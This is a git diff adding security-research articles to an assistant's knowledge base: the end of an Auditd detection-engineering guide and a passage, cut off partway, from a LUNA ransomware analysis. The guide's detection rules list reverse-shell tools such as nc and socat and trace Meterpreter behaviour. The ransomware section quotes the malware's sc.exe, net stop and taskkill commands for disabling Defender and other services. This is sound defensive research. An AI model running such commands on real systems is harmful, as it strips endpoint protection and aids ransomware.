+For our Auditd rule management, you can either supply the rules in the Audit rules section, or leverage a rule file and specify the file path to read this file from. The rule format is similar to the rule format for the Auditd Logs integration. However, instead of supplying control flags in our rule file, you can set these options in the integration settings instead.
+
+![Setting Auditd rules](/assets/images/linux-detection-engineering-with-auditd/image16.png)
+
+
+Auditd Manager automatically purges all existing rules prior to adding any new rules supplied in the configuration, making it unnecessary to specify the ```-D``` flag in the rule file. Additionally, you can set our failure mode to ```silent``` in the settings, and therefore do not need to supply the ```-f``` flag either.
+
+![Specifying failure mode](/assets/images/linux-detection-engineering-with-auditd/image6.png)
+
+
+You can set the backlog limit as well, which would be similar to setting the ```-b``` flag.
+
+![Specifying the backlog limit](/assets/images/linux-detection-engineering-with-auditd/image29.png)
+
+
+There is also an option for setting the backpressure strategy, equivalent to the ```--backlog_wait_time``` setting.
+
+![Setting the backpressure strategy](/assets/images/linux-detection-engineering-with-auditd/image22.png)
+
+
+Finally, check the option to preserve the original event, as this will allow you to analyze the event easier in the future.
+
+![Preserve original event toggle](/assets/images/linux-detection-engineering-with-auditd/image19.png)
+
+
+You can now save the integration, and apply it to the agent policy for the hosts from which you would like to receive Auditd logs.
+
+## Auditd rule file troubleshooting
+
+The rule file provided by Neo23x0 does not work for Auditd Manager by default. To get it to work, you will have to make some minor adjustments such as removing the control type flags, a UID to user conversion for a user that is not present on default systems, or a redundant rule entry. The changes that have to be made will ultimately be unique to your environment.
+
+You have two ways of identifying the errors that will be generated when copy-pasting an incompatible file into the Auditd Manager integration. You can navigate to the agent that received the policy, and look at the integration input error. You can analyze the errors one by one, and change or remove the conflicting line.
+
+![Integration input status logs](/assets/images/linux-detection-engineering-with-auditd/image11.png)
+
+
+You can also use the [Discover](https://www.elastic.co/guide/en/kibana/current/discover.html) tab, select our Auditd Manger data view, and filter for events where the ```auditd.warnings``` field exists, and go through the warnings one-by-one.
+
+![Auditd warnings in Discover](/assets/images/linux-detection-engineering-with-auditd/image14.png)
+
+
+For example, you can see that the error states “unknown rule type” , which is related to Auditd not supporting control rules. The “failed to convert user ‘x’ to a numeric ID”, is related to the user not existing on the system. And finally, “rule ‘x’ is a duplicate of ‘x’”, is related to duplicate rules. Now that you removed the conflicting entries, and our agent status is healthy, you can start analyzing some Auditd data!
+
+## Analyzing Auditd Manager events
+
+Now that you have Auditd Manager data available in our Elasticsearch cluster, just like you did before, you can create a dataview for the ```logs-auditd_manager.auditd*``` index to specifically filter this data. Our implemented rule file contains the following entry:
+
+```
+-w /etc/sudoers -p rw -k priv_esc
+```
+
+This captures read and write actions for the ```/etc/sudoers``` file, and writes these events to a log with the ```priv_esc``` key. Let’s execute the ```cat /etc/sudoers``` command, and analyze the event. Let us first look at some of the fields containing general information.
+
+![Important fields within an event generated by Auditd Manager](/assets/images/linux-detection-engineering-with-auditd/image8.png)
+
+
+You can see that the ```/etc/sudoers``` file was accessed by the ```/usr/bin/cat``` binary through the ```openat()``` syscall. As the file owner and group are ```root```, and the user requesting access to this file is not UID 0 (root), the ```openat()``` syscall failed, which is represented in the log. Finally, you can see the tag that was linked to this specific activity. 
+
+Digging a bit deeper, you can identify additional information about the event.
+
+![Important fields within an event generated by Auditd Manager](/assets/images/linux-detection-engineering-with-auditd/image28.png)
+
+
+You can see the process command line that was executed, and which process ID and process parent ID initiated the activity. Additionally, you can see from what architecture the event originated and through which ```tty``` (terminal connected to standard input) the command was executed. 
+
+To understand the a0-3 values, you need to dig deeper into Unix syscalls. You should at this point be aware of what a syscall is, but to be complete, a Unix syscall (system call) is a fundamental interface that allows a program to request a service from the operating system's kernel, such as file operations, process control, or network communications.
+
+Let’s take a look at the ```openat()``` syscall. Consulting the ```open(2)``` man page (source), you see the following information.
+
+![System calls manual for open(2)](/assets/images/linux-detection-engineering-with-auditd/image27.png)
+
+
+```openat()``` is an evolved version of the ```open()``` syscall, allowing for file access relative to a directory file descriptor (```dirfd```). This syscall enables a program to open a file or directory — a crucial operation for many system tasks. You can see that the syscall is part of the standard C library, and is available in ```fcntl.h``` header through the ```#include <fcntl.h>``` include statement.
+
+Consulting the manual, you can see the ```openat()``` syscall syntax is as follows:
+
+```
+int openat(int dirfd, const char *pathname, int flags, /* mode_t mode */);
+```
+
+ - ```dirfd``` specifies the directory file descriptor.
+ - ```*pathname``` is a pointer to the name of the file/directory to be opened.
+ - ```flags``` determine the operation mode (e.g., read, write, create, etc.).
+
+Returning to our original event, you are now ready to understand the ```auditd.data.a0-a3``` fields. The ```a0``` to ```a3``` values in an auditd log represent the arguments passed to a syscall. These arguments are crucial for understanding the context and specifics of the syscall's execution. Let's break down how these values relate to ```openat()``` and what they tell us about the attempted operation based on our earlier exploration.
+
+ - ```auditd.data.a0``` (```dirfd```): The a0 value, ```ffffff9c```, indicates a special directive, ```AT_FDCWD```, suggesting the operation is relative to the current working directory.
+ - ```auditd.data.a1``` (```pathname```): The ```a1``` value, ```7ffd0f81871d```, represents a hexadecimal memory address pointing to the pathname string of the target file or directory. In this case, it refers to an attempt to access the ```/etc/sudoers``` file.
+ - ```auditd.data.a2``` (```flags```): Reflected by the ```a2``` value of ```0```, the flags argument specifies the mode in which the file is to be accessed. With ```0``` indicating no special flags were used, it implies a default operation – most likely read-only access.
+ - ```auditd.data.a3``` (```mode```): The ```a3``` value, also 0, becomes relevant in contexts where the file is being created, dictating the permissions set on the new file.
+
+Based on the analysis above, you now have a pretty good understanding of how to interpret Auditd Manager events.
+
+A different way of quickly getting an idea of what an Auditd Manager event means is by using Elastic’s built-in [AI Assistant](https://www.elastic.co/guide/en/security/current/security-assistant.html). Let’s execute the ```whoami``` command, and take a look at the ```auditd.messages``` field within the event.
+
+![Content of the auditd.messages field](/assets/images/linux-detection-engineering-with-auditd/image3.png)
+
+
+You can ask the Elastic AI Assistant to do the heavy lifting and analyze the event, after which you only have to consult the syscall manual to make sure that it was correct. Let’s first create a new system prompt, focused on analyzing Auditd logs, somewhat similar to this: 
+
+![Auditd log analysis prompt for Elastic’s AI assistant](/assets/images/linux-detection-engineering-with-auditd/image18.png)
+
+
+You can now leverage the newly created system prompt, and paste your Auditd message in there without any additional formatting, and receive the following response:
+
+![Auditd log analysis by Elastic’s AI assistant](/assets/images/linux-detection-engineering-with-auditd/image10.png)
+
+
+Generative AI tools are very useful for receiving a quick explanation of an event. But generative AI can make mistakes, so you should always be cognizant of leveraging AI tools for this type of analysis, and double check what output it generates. Especially when leveraging the output of these tools for detection rule development, as one minor mistake could lead to faulty logic.
+
+## Auditd Manager detection rule examples
+
+After reading the previous section, you should now have enough knowledge available to get started analyzing Auditd Manager logs. The current Elastic detection rules rule set mostly leverages the [Elastic Defend integration](https://docs.elastic.co/en/integrations/endpoint), but the number of rules that leverage Auditd is increasing significantly. This section will dive into several detection rules that leverage Auditd, explain the why and try to teach some underused techniques for writing detection rule queries.
+
+### Potential reverse shell via UDP
+
+The [Potential Reverse Shell via UDP](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_udp_cli_utility_linux.toml) rule aims to identify UDP-based reverse shells. As Elastic Defend does not currently capture UDP traffic, you can leverage Auditd to close this visibility gap. The rule leverages the following logic: 
+
+```
+sample by host.id, process.pid, process.parent.pid
+  [process where host.os.type == "linux" and event.type == "start" and event.action == "executed" and process.name : (
+    "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*",
+    "ruby", "openssl", "awk", "telnet", "lua*", "socat"
+    )]
+  [process where host.os.type == "linux" and auditd.data.syscall == "socket" and process.name : (
+    "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*",
+    "ruby", "openssl", "awk", "telnet", "lua*", "socat"
+    ) and auditd.data.a1 == "2"]
+  [network where host.os.type == "linux" and event.type == "start" and event.action == "connected-to" and
+   process.name : (
+    "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*",
+    "ruby", "openssl", "awk", "telnet", "lua*", "socat"
+    ) and network.direction == "egress" and destination.ip != null and
+   not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")]
+```
+
+The rule leverages the [sample](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-samples) functionality, which describes and matches a chronologically unordered series of events. This will ensure the sequence also triggers if the events occur in the same millisecond. Additionally, we leverage a whitelisting approach to specify suspicious binaries that are capable of spawning a reverse connection, allowing for a minimized false-positive rate.
+
+We ensure the capturing of UDP connections by leveraging the Auditd data related to the [```socket()```](https://man7.org/linux/man-pages/man2/socket.2.html) syscall.
+
+![System calls manual synopsis for socket(2)](/assets/images/linux-detection-engineering-with-auditd/image23.png)
+
+
+We see that the a0 value represents the domain, ```a1``` represents the type and ```a2``` represents the protocol used. Our rule leverages the ```auditd.data.a1 == "2"``` syntax, which translates to the ```SOCK_DGRAM``` type, which is UDP. 
+
+![System calls manual types description for socket(2)](/assets/images/linux-detection-engineering-with-auditd/image9.png)
+
+
+Finally, we ensure that we capture only egress network connections from the host and ensure the exclusion of IPv4 and IPv6 loopback addresses, IPv4 link-local and multicast addresses, and sequence the query by ```process.pid``` and ```process.parent.pid``` to make sure the events originate from the same (parent) process. 
+
+![Potential reverse shell via UDP alert](/assets/images/linux-detection-engineering-with-auditd/image23.png)
+
+
+If we want to hunt for suspicious processes opening UDP sockets, we can query all socket() syscalls with ```auditd.data.a1 == "2"```, count the number of distinct process occurrences, and sort them in an ascending order to find anomalies. To do so, we can leverage this ES|QL query:
+
+```
+FROM logs-*, auditbeat-*
+| EVAL protocol = CASE(
+    auditd.data.a1 == "1", "TCP",
+    auditd.data.a1 == "2", "UDP"
+)
+| WHERE host.os.type == "linux" and auditd.data.syscall == "socket" and protocol == "UDP"
+| STATS process_count = COUNT(process.name), host_count = COUNT(host.name) by process.name, protocol
+| SORT process_count asc
+| LIMIT 100
+```
+
+![ES|QL query for detecting uncommon UDP network connections](/assets/images/linux-detection-engineering-with-auditd/image34.png)
+
+
+Looking at the results, we can see quite a few interesting processes pop up, which might be a good starting point for threat hunting purposes. 
+
+### Potential Meterpreter reverse shell
+
+Another interesting type of reverse connections that we leveraged Auditd for is the detection of the [Meterpreter shell](https://docs.rapid7.com/metasploit/manage-meterpreter-and-shell-sessions/), which is a popular reverse shell used within the [Metasploit-Framework](https://www.metasploit.com/). The [Potential Meterpreter Reverse Shell](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_meterpreter_linux.toml) rule leverages Meterpreter’s default host enumeration behavior to detect its presence. 
+
+```
+sample by host.id, process.pid, user.id
+  [file where host.os.type == "linux" and auditd.data.syscall == "open" and auditd.data.a2 == "1b6" and file.path == "/etc/machine-id"]
+  [file where host.os.type == "linux" and auditd.data.syscall == "open" and auditd.data.a2 == "1b6" and file.path == "/etc/passwd"]
+  [file where host.os.type == "linux" and auditd.data.syscall == "open" and auditd.data.a2 == "1b6" and file.path == "/proc/net/route"]
+  [file where host.os.type == "linux" and auditd.data.syscall == "open" and auditd.data.a2 == "1b6" and file.path == "/proc/net/ipv6_route"]
+  [file where host.os.type == "linux" and auditd.data.syscall == "open" and auditd.data.a2 == "1b6" and file.path == "/proc/net/if_inet6"]
+```
+
+When Meterpreter spawns, it collects default system information such as the machine, user, and IP routing information by reading specific system files. We can see this behavior when decompiling the Meterpreter payload, as the paths are hardcoded into the binary.
+
+![Dissemination of a Meterpreter payload showing hardcoded full paths](/assets/images/linux-detection-engineering-with-auditd/image26.png)
+
+
+Our detection logic leverages ```auditd.data.a2 == “1b6”```, as this is consistent with the Meterpreter’s behavior. We can find Meterpreter leveraging this specific syscall combination to read files by looking at the way Meterpreter opens file handlers. 
+
+![Dissemination of a Meterpreter payload showing the implementation of fopen64 syscalls](/assets/images/linux-detection-engineering-with-auditd/image2.png)
+
+
+Just for informational purposes, some other paths that Meterpreter reads from can be found in the screenshot below.
+
+![Auditd Manager events originating from Meterpreter payloads](/assets/images/linux-detection-engineering-with-auditd/image20.png)
+
+
+We can leverage [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) to analyze a set of Meterpreter reverse shells, and easily find out what file paths are being accessed by all of them. 
+
+```
+FROM logs-*, auditbeat-*
+| WHERE host.os.type == "linux" and event.action == "opened-file" and process.name in ("shell-x64.elf", "JBNhk", "reverse.elf", "shell.elf", "elf") and auditd.data.a2 == "1b6"
+| STATS file_access = COUNT_DISTINCT(process.name) by file.path
+| SORT file_access desc
+| LIMIT 100
+```
+
+![ES|QL query for analyzing which paths are accessed by different Meterpreter payloads](/assets/images/linux-detection-engineering-with-auditd/image17.png)
+
+
+In this example we are only analyzing 5 Meterpreter shells, but using ES|QL we can easily scale this analysis to larger numbers. Based on the information above, we can see that the paths that were selected for the detection rule are present in all five of the samples. 
+
+Combining the above logic, we can potentially discover Linux Meterpreter payloads.
+
+![Potential Meterpreter reverse shell alert](/assets/images/linux-detection-engineering-with-auditd/image35.png)
+
+
+### Linux FTP/RDP brute force attack detected
+
+Given that there are so many different FTP/RDP clients available for Linux, and the authentication logs are not entirely implemented similarly, you can leverage Auditd’s ```auditd.data.terminal``` field to detect different FTP/RDP implementations. Our FTP detection logic looks as follows:
+
+```
+sequence by host.id, auditd.data.addr, related.user with maxspan=3s
+  [authentication where host.os.type == "linux" and event.action == "authenticated" and 
+   auditd.data.terminal == "ftp" and event.outcome == "failure" and auditd.data.addr != null and 
+   auditd.data.addr != "0.0.0.0" and auditd.data.addr != "::"] with runs=5
+
+  [authentication where host.os.type == "linux" and event.action  == "authenticated" and 
+   auditd.data.terminal == "ftp" and event.outcome == "success" and auditd.data.addr != null and 
+   auditd.data.addr != "0.0.0.0" and auditd.data.addr != "::"] | tail 1
+```
+
+Here, we sequence 5 failed login attempts with 1 successful login attempt on the same host, from the same IP and for the same user. We leverage the [tail](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-pipe-ref.html) feature which works similar to tail in Unix, selecting the last X number of alerts rather than selecting all alerts within the timeframe. This does not affect the SIEM detection rules interface, it is only used for easier readability as brute force attacks can quickly lead to many alerts.
+
+![Potential Linux RDP brute force attack detected alert](/assets/images/linux-detection-engineering-with-auditd/image7.png)
+
+
+Although we are leveraging different FTP tools such as ```vsftpd```, the ```auditd.data.terminal``` entry remains similar across tooling, allowing us to capture a broader range of FTP brute forcing attacks. Our RDP detection rule leverages similar logic:
+
+```
+sequence by host.id, related.user with maxspan=5s
+  [authentication where host.os.type == "linux" and event.action == "authenticated" and
+   auditd.data.terminal : "*rdp*" and event.outcome == "failure"] with runs=10
+  [authentication where host.os.type == "linux" and event.action  == "authenticated" and
+   auditd.data.terminal : "*rdp*" and event.outcome == "success"] | tail 1
+```
+
+Given that ```auditd.data.terminal``` fields from different RDP clients are inconsistent, we can leverage wildcards to capture their authentication events. 
+
+![Potential Linux FTP brute force attack detected alert](/assets/images/linux-detection-engineering-with-auditd/image21.png)
+
+
+### Network connection from binary with RWX memory region
+
+The [```mprotect()```](https://man7.org/linux/man-pages/man2/mprotect.2.html) system call is used to change the access protections on a region of memory that has already been allocated. This syscall allows a process to modify the permissions of pages in its virtual address space, enabling or disabling permissions such as read, write, and execute for those pages. Our aim with this detection rule is to detect network connections from binaries that have read, write and execute memory region permissions set. Let’s take a look at the syscall.
+
+![System calls manual synopsis for mprotect](/assets/images/linux-detection-engineering-with-auditd/image3.png)
+
+
+For our detection rule logic, the ```prot``` value is most important. You can see that ```prot``` can have the following access flags:
+
+![System calls manual prot access flags description for mprotect](/assets/images/linux-detection-engineering-with-auditd/image12.png)
+
+
+As stated, ```prot``` is a bitwise OR of the values in the list. So for read, write, and execute permissions, we are looking for an int of:
+
+```
+int prot = PROT_READ | PROT_WRITE | PROT_EXEC;
+```
+
+This translates to a value of ```0x7``` after bitwising, and therefore we will be looking at an ```auditd.data.a2 == “7”```. We have created two detection rules that leverage this logic - [Unknown Execution of Binary with RWX Memory Region](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml) and [Network Connection from Binary with RWX Memory Region](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml). The detection rules that leverage specific Auditd configurations in order to function, will have a note about what rule to add in their setup guide:
+
+![Auditd Setup guide for detection rule](/assets/images/linux-detection-engineering-with-auditd/image15.png)
+
+
+The prior leverages the [new_terms](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule) rule type, which allows us to detect previously unknown terms within a specified time window. This allows us to detect binaries with RWX permissions that are being seen on a specific host for the first time, while reducing false positives for binaries that are overly permissive but used on a regular basis.
+
+The latter leverages the following detection logic:
+
+```
+sample by host.id, process.pid, process.name
+[process where host.os.type == "linux" and auditd.data.syscall == "mprotect" and auditd.data.a2 == "7"]
+[network where host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and
+   not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")
+]
+```
+
+We sample a process being executed with these RWX permissions, after which a network connection (excluding loopback, multicast, and link-local addresses) is initiated.
+
+Interestingly enough, Metasploit often assigns these RWX permissions to specific regions of its generated payloads. For example, one of the events that trigger this detection logic in a testing stack is related to the execution of [Metasploit’s Postgres Payload for Linux](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/postgres/postgres_payload.rb). When analyzing this payload’s source code, you can see that the payload_so function defines the ```PROT_READ```, ```PROT_WRITE``` and ```PROT_EXEC``` flags.
+
+![Metasploit’s Postgres payload_so function](/assets/images/linux-detection-engineering-with-auditd/image4.png)
+
+
+After which a specific memory region, with a specific page size of ```0x1000``` is given the RWX access flags in a similar fashion as described earlier. 
+
+![Metasploit’s Postgres run_payload function](/assets/images/linux-detection-engineering-with-auditd/image31.png)
+
+
+After running the payload, and querying the stack, you can see several hits are returned, which are all related to Metasploit Meterpreter payloads.
+
+![Network connection from binary with RWX memory region alert](/assets/images/linux-detection-engineering-with-auditd/image13.png)
+
+
+Focusing on the Postgres payload that we were analyzing earlier, you can see the exact payload execution path through our [visual event analyzer](https://www.elastic.co/guide/en/security/current/visual-event-analyzer.html). Elastic Security allows any event detected by Elastic Endpoint to be analyzed using a process-based visual analyzer, which shows a graphical timeline of processes that led up to the alert and the events that occurred immediately after. Examining events in the visual event analyzer is useful to determine the origin of potentially malicious activity and other areas in your environment that may be compromised. It also enables security analysts to drill down into all related hosts, processes, and other events to aid in their investigations.
+
+![Visual event analyzer view for Metasploit’s Postgres payload execution](/assets/images/linux-detection-engineering-with-auditd/image32.png)
+
+
+In the analyzer you can see perl being leveraged to create and populate the jBNhk payload in the /tmp directory (with RWX permissions) and spawning a reverse Meterpreter shell. 
+
+## Conclusion
+
+In this post, we've dived into the world of Auditd, explaining what it is and its purpose. We showed you how to get Auditd up and running, how to funnel those logs into Elasticsearch to boost Unix/Linux visibility and enable you to improve your Linux detection engineering skills. We discussed how to craft Auditd rules to keep an eye on specific activities, and how to make sense of the events that it generates. To make life easier, we introduced Auditd Manager, an integration created by Elastic to take some of the management load off your shoulders. Finally, we wrapped up by exploring various detection rules and some of the research that went into creating them, enabling you to get the most out of this data source.
+
+We hope you found this guide helpful! Incorporating Auditd into your Unix systems is a smart move for better security visibility. Whether you decide to go with our pre-built detection rules or craft some of your own, Auditd can really strengthen your Unix security game.
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/luna_ransomware_attack_pattern.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/luna_ransomware_attack_pattern.md
new file mode 100644
index 0000000000000..bf47b29069bff
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/luna_ransomware_attack_pattern.md
@@ -0,0 +1,463 @@
+---
+title: "LUNA Ransomware Attack Pattern Analysis"
+slug: "luna-ransomware-attack-pattern"
+date: "2022-08-31"
+subtitle: "LUNA attack pattern and malware observations"
+description: "In this research publication, we'll explore the LUNA attack pattern — a cross-platform ransomware variant."
+author:
+  - slug: salim-bitam
+  - slug: seth-goodwin
+  - slug: andrew-pease
+  - slug: daniel-stepanic
+image: "dark-side-of-moon-flickr-earth-shine-thumbnail.jpeg"
+category:
+  - slug: attack-pattern
+tags:
+  - luna
+  - ref5264
+---
+
+## Key Takeaways
+
+- LUNA is ransomware that achieves cross-platform capabilities through its development in Rust
+- The Windows capabilities are comparable to other ransomware peers
+- The Linux capabilities, while functional, are less elegant than the Windows variant
+
+## Preamble
+
+LUNA Ransomware, which Elastic tracks as REF5264, is a Rust-based ransomware first identified by Kaspersky in [their report](https://securelist.com/luna-black-basta-ransomware/106950/) introducing it in July 2022. Rust as a programming language is known in the developer community for being simpler to implement cross-platform software to work on various target operating systems. It’s able to do this through a convenient cluster of tools that abstract away some operating system peculiarities, likely allowing the malware author to focus more on core functionality.
+
+From the Kaspersky report we were able to collect two LUNA Ransomware samples: (1) a Linux ELF binary, and (2) a Windows PE executable.
+
+This research covers:
+
+- Execution and behavior of each sample
+- Description of the encryption mechanism
+- Comparison across our samples
+- Comparison to other ransomware
+- Detection opportunities
+
+## Execution Chain
+
+In the following sections, we'll describe both the Linux and Windows execution chains.
+
+### Linux execution
+
+Our Linux sample required an argument to execute. The options were **-file [file]** to encrypt a single file, or **-dir [directory]** to walk and encrypt the contents of a specified directory and drop a ransom note. If executed with no arguments, Linux LUNA returns a help page with instructions to use one of the two available arguments. If executed with both the **-file** and **-dir** arguments (including multiple files or directories), all arguments are used.
+
+![LUNA instructions](/assets/images/luna-ransomware-attack-pattern/image7.jpg)
+
+There are no functional protections against encrypting system directories or files. We were able to demonstrate this through encryption of **/etc**. The execution loop continued as expected until it encrypted the **shadow** and **sudoers** files and the process was unable to verify privileges for further file access. The test machine then became unresponsive and required reverting to a prior snapshot. Encryption of these critical system files prevents further encrypting of privileged files and directories the malware attempts to access.
+
+![LUNA ransomware flow for Linux](/assets/images/luna-ransomware-attack-pattern/image12-1.jpg)
+
+![LUNA functions for Linux](/assets/images/luna-ransomware-attack-pattern/image10.jpg)
+
+All encrypted files are appended with a **.Luna** extension, i.e. **/etc/passwd.Luna**. If using the **-dir** flag, a **r\*\*** eadme-Luna.txt **ransom note will be created at the root of each encrypted directory as well as subdirectories such as** /etc/readme-Luna.txt **and** /etc/ssl\readme-Luna.txt **. While there are no ransomware notes dropped when encrypting an individual file using the** -file **flag, the encrypted file is still appended with the**.Luna\*\* extension.
+
+> You may notice the backslash instead of a forward slash in the above full path **/etc/ssl\readme-Luna.txt**. This is an interesting artifact of LUNA hardcoding a \*\*\*\* to append to subdirectories when building the full path for the ransom note. This behavior is expected and would go unnoticed in a Windows environment, but drew our attention when we saw it in Linux. It does not appear to hinder functionality.
+
+![Hardcoded backslash in LUNA for Linux](/assets/images/luna-ransomware-attack-pattern/image6.jpg)
+
+The ransom note is embedded in the binary in a Base64 format and placed in the root of the targeted directories.
+
+![LUNA ransom note for Linux](/assets/images/luna-ransomware-attack-pattern/image19.jpg)
+
+The ransom note contains grammatical and spelling errors, listing two ProtonMail email addresses. ProtonMail is an end-to-end encrypted email service based in Switzerland. ProtonMail is popular with privacy-minded individuals and organizations because it uses client-side encryption to protect email content and user data before they are sent to ProtonMail servers.
+
+The phrase “All your files were moved to secure storage” may be either a translation error for “encrypted” or an attempt to trick the victim into believing their data has been encrypted and stolen to later be used for extortion. This could also refer to some operation that is to occur before encryption takes place. There is no network connectivity aspect of this malware.
+
+There is a threat of extortion with the phrase “we can show your real face”, but no extortion site has been observed as other extortion activity groups, like [CUBA Ransomware](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis), have used.
+
+#### Linux Exclusions
+
+Our Linux LUNA sample includes functional but largely unnecessary exclusions leftover from the Windows implementation. These checks are performed in the **-dir** execution flow before a file is sent to the **add_file** function for encryption. As an example, see the **.ini** , **.exe** , **.dll** , and **.lnk** extensions and **OpenServer** , **Windows** , **Program Files** , **Recycle.Bin** , **ProgramData** , **AppData** , and the **All Users** directories below. Of note, while the **.Luna** extension is included in the vestigial exclusions, it is present in both Windows and Linux.
+
+![Windows File Extension Exclusions within the Linux sample](/assets/images/luna-ransomware-attack-pattern/image20-2.jpg)
+
+![Windows Folder Exclusions in the Linux sample](/assets/images/luna-ransomware-attack-pattern/image21-2.jpg)
+
+|                           |                                                                      |
+| ------------------------- | -------------------------------------------------------------------- |
+| File Extension Exclusions | Folder Exclusions                                                    |
+| .Luna.ini.exe.dll.lnk     | OpenServerWindowsProgram FilesRecycle.BinProgramDataAppDataAll users |
+
+Linux LUNA checks for Windows file extensions and folders and will not encrypt files with the specified extensions on a Linux victim.
+
+![Folder directory with Windows extensions before execution](/assets/images/luna-ransomware-attack-pattern/image17.jpg)
+
+![Folder directory with Windows extensions after execution](/assets/images/luna-ransomware-attack-pattern/image5.jpg)
+
+The check for the **.Luna** extension is useful in that it prevents re-encrypting an already encrypted file.
+
+### Windows execution
+
+The Windows sample we found was a more full-featured product that included much of the functionality present in other mature ransomware families. It still includes the **-dir** and **-file** flags, but now if the malware is run without arguments, the Windows LUNA will perform some preliminary defense evasion, file protection preparation, and enumeration measures before entering the **-dir** execution loop. Additionally within the **-dir** execution flow Windows LUNA file and directory exclusions are functional and serve to protect critical system processes from being corrupted by encryption. This is different from what was observed with the Linux LUNA implementation which does not exclude sensitive OS directories or files that can impact system stability.
+
+![LUNA ransomware flow for Windows](/assets/images/luna-ransomware-attack-pattern/image12.png)
+
+![LUNA functions for Windows](/assets/images/luna-ransomware-attack-pattern/image9.jpg)
+
+LUNA uses service and process termination to de-conflict any files locked by other programs to successfully encrypt them along with disabling security products that may prevent ransomware execution. It does this by leveraging a built-in Rust process builder ( **std::sys::windows::process::Command::new** ) to call three new processes with their own pre-defined command-line arguments.
+
+- Service Control
+- Net
+- TaskKill
+
+#### Service Control
+
+[Service Control](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config) is a Windows utility used to modify services’ entries in the registry and in the Service Control Manager database. In this case, it’s used to ensure a service that is stopped cannot be restarted and interrupt malware execution.
+
+![Service Control disabling security products](/assets/images/luna-ransomware-attack-pattern/image4.jpg)
+
+- **"C:\WINDOWS\system32\sc.exe" config [service] start=disabled**
+  - **"C:\WINDOWS\system32\sc.exe"** : Service Control executable
+  - **config [service]**: Specifies the service (as an example, WinDefend) that will be modified
+  - **start=disabled** : Sets the start type of the service to “disabled”
+
+LUNA does not check that a service exists before issuing the service disable command. So it will commonly get [1060 errors](https://docs.microsoft.com/en-us/windows/win32/debug/system-error-codes--1000-1299-#ERROR_SERVICE_DOES_NOT_EXIST) to the console indicating that **sc.exe** attempted to modify a service that does not exist.
+
+![Service Control generating code 1060 errors](/assets/images/luna-ransomware-attack-pattern/image22.jpg)
+
+Our LUNA sample attempts to disable 253 different services. See the Appendix: Windows Services Termination List for the complete list.
+
+#### Net
+
+[Net](https://attack.mitre.org/software/S0039/) ( **net.exe** ) is a Windows utility used in command-line operations for the control of users, groups, services, and network connections. In this case, it is used to stop the running services that have already been prevented from restarting by **sc.exe**.
+
+![Net disabling security products](/assets/images/luna-ransomware-attack-pattern/image18.jpg)
+
+- **"C:\WINDOWS\system32\net.exe" stop [service] /y**
+  - **"C:\WINDOWS\system32\net.exe"** : Net executable
+  - **stop [service]**: Specifies the name of the service (as an example, WinDefend) that will be stopped
+  - **/y** : Carries out the command without first prompting to confirm actions
+
+Again there are no checks that the service is actually running on the victim machine. For Net, this manifests as **2185** errors printing to the console for each attempt to stop a nonexistent service.
+
+![Net generating code 2185 errors](/assets/images/luna-ransomware-attack-pattern/image13.jpg)
+
+#### TaskKill
+
+[TaskKill](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill) ( **taskkill.exe** ) is a Windows utility used to end a task or process by the process ID or image name. LUNA uses TaskKill to terminate processes by name that could interfere with the malware’s operation by maintaining file access locks on files targeted for encryption.
+
+![TaskKill disabling security products](/assets/images/luna-ransomware-attack-pattern/image11.jpg)
+
+- **"C:\WINDOWS\system32\taskkill.exe" /im [process name] /f**
+  - **"C:\WINDOWS\system32\taskkill.exe"** : TaskKill executable
+  - **/im [process name]**: Specifies the name of the process (as an example, msmpeng.exe) that will be terminated
+  - **/f** : Specifies that processes be forcefully ended
+
+Once again, there are no checks that the process is actually running. TaskKill produces “process not found” errors printed to the console for attempts to kill non-existent processes.
+
+![TaskKill generating errors codes](/assets/images/luna-ransomware-attack-pattern/image3.jpg)
+
+Our sample contained a hardcoded list of 997 processes to kill. See the Appendix: Windows Process Termination List for the complete list.
+
+#### Disk enumeration
+
+Next, Windows LUNA executed with no arguments uses a function called **get_all_drives** to brute-force the enumeration of all the available drives by going through the English alphabet and verifying if the drives are mapped to the machine using Rust library **std::fs::read_dir**. If the volume exists, it will be flagged for encryption at a later stage.
+
+![LUNA identifying volumes for encryption](/assets/images/luna-ransomware-attack-pattern/image14.jpg)
+
+All volumes identified are then passed to LUNA’s **walk_dir** function that will drop ransom notes, enumerate subdirectories, and encrypt files similar to the Linux version with the exact same ransomware note.
+
+![LUNA ransom note for Windows](/assets/images/luna-ransomware-attack-pattern/image8.jpg)
+
+#### Windows exclusions
+
+Unlike the Linux version, however, the Windows LUNA file and folder exclusions are respected to prevent making the targeted machine inoperable or inadvertently stopping encryption prematurely.
+
+|                           |                                                                      |
+| ------------------------- | -------------------------------------------------------------------- |
+| File Extension Exclusions | Folder Exclusions                                                    |
+| .Luna.ini.exe.dll.lnk     | OpenServerWindowsProgram FilesRecycle.BinProgramDataAppDataAll users |
+
